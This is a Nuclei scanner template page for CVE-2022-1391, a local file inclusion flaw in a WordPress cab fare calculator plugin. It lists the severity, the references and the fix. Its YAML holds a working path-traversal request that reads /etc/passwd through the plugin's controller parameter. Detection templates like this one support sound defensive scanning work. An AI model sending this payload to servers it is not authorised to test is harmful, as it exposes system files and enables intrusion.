Skip to content
Nuclei Templates

WordPress Cab fare calculator < 1.0.4 - Local File Inclusion

ID: CVE-2022-1391

Severity: critical

Author: Splint3r7

Tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev

Description

Section titled “Description”

The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

YAML Source

Section titled “YAML Source”
id: CVE-2022-1391


info:
  name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
  author: Splint3r7
  severity: critical
  description: |
    The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially exposing sensitive information.
  remediation: |
    Update to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50843
    - https://wordpress.org/plugins/cab-fare-calculator
    - https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1391
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1391
    cwe-id: CWE-22
    epss-score: 0.03037
    epss-percentile: 0.90957
    cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: kanev
    product: cab_fare_calculator
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev


http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a0046304402201e35aa8da800b1aa7f40e5ea9cee66f3e02f50242ea55ea21daacd840a3c1b8f0220051395ee52939f111fd33c743c77683a17e03cc743e44a18fbd3c5bc7ef322a1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1391.yaml"

View on Github